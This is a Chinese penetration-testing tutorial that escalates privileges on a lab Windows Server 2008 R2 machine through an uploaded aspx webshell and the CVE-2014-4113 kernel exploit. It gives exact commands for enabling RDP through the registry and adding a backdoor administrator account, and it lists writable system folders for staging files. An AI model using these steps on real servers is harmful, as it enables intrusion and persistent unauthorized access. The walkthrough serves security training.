111.网络安全渗透测试—[权限提升篇9]—[Windows 2008 R2内核溢出提权]

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！

一、Windows内核溢出提权[2008]

1、内核溢出提权背景：

       在winserver2008 R2中，服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。

2、CVE-2014-4113-Exploit

       这个版本的提权工具，可以对winserver2008 的系统进行溢出提权

3、内核溢出提权过程：

（1）实验环境：

1.靶机环境：
（1）虚拟机Windows2008【target_sys.com】【192.168.97.131】
（2）脚本语言环境：php/asp语言环境存在

2.攻击机：
（1）虚拟机Win7【192.168.97.130】
（2）Firefox+Burpsuite+蚁剑+大马

3.网络环境：
（1）VMware搭建的NAT网络

（2）靶机链接：

URL：http://target_sys.com/upload.php

（3）实验过程：

第一步：访问靶机链接，利用MIME突破白名单类型限制，上传up.aspx大马
【以上过程略】以下进行提权过程：

第二步：连接up.aspx大马【密码为admin】，并点击[CmdShell]模块，调用cmd.exe执行whoami命令，查看当前用户信息，发现权限很低

在winserver2008 R2中，服务器默认是支持aspx的。所以默认都是可以执行一些命令：

第三步：点击[CmdShell]模块，调用cmd.exe执行systeminfo命令，把结果复制出来，然后利用wes.py脚本扫描漏洞，但是没有扫出来

扫描结果：扫描失败

第四步： 把systeminfo的信息放入该网址中，检索相关提权exp，最后发现CVE-2014-4113可以提权。同时我们通过msfconsole，键入search kernel也可以检索到一些exp，依次进入然后键入info，发现一些是2008R2的提权exp，下图中的ms14-058就是对应着CVE-2014-4113。

exp传送门

第五步：点击[File Manager]文件管理模块，上传rw.aspx用来扫描可读可写文件夹

第六步：访问刚刚上传的rw.aspx大马，扫描可读可写文件夹

如下图所示，我们扫描到了一些可读可写的文件夹，经过不完全测试，发现网站根目录下可以利用。

第七步：回到刚刚的大马，上传CVE-2014-4113-Exploit的exp到c:\inetpub\wwwroot\target_sys.com下

第八步：点击[CmdShell]模块，调用cmd执行刚刚传上去的cve-2017-4113的exp，如下所示，成功溢出

第九步： 依次执行以下命令，开启3389端口，新增管理员组用户demo1，最后再远程连接靶机。

/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano" #查看端口状态

/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" #开启3389

/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano" #验证是否开启3389

/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user demo1 123 /add"#添加用户demo1/213

/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net localgroup administrators demo1 /add" #把demo1用户加入管理员组

/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user" #验证demo1用户是否存在

mstsc远程桌面连接：

   附：常见可读写目录

≤2003可读写目录

C:\RECYCLER\
D:\RECYCLER\
E:\RECYCLER\
C:\Windows\temp\
C:\Windows\Debug\
C:\Windows\Registration\CRMLog\
C:\Documents and Settings\All Users\Documents\

≥2008可读写目录

C:\ProgramData\
C:\Windows\temp\
C:\Windows\Tasks\
C:\Windows\tracing\    //不可删
C:\Windows\debug\WIA\
C:\Windows\servicing\Sessions\
C:\Windows\servicing\Packages\
C:\Windows\Registration\CRMLog\
C:\Windows\System32\spool\drivers\color\
C:\Users\Default\AppData\    //不可删
C:\ProgramData\Microsoft\DeviceSync\
C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\
C:\ProgramData\Microsoft\User Account Pictures\    //不可删
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\    //不可删
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\syswow64\tasks\microsoft\Windows\pla\system\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\
C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\
C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\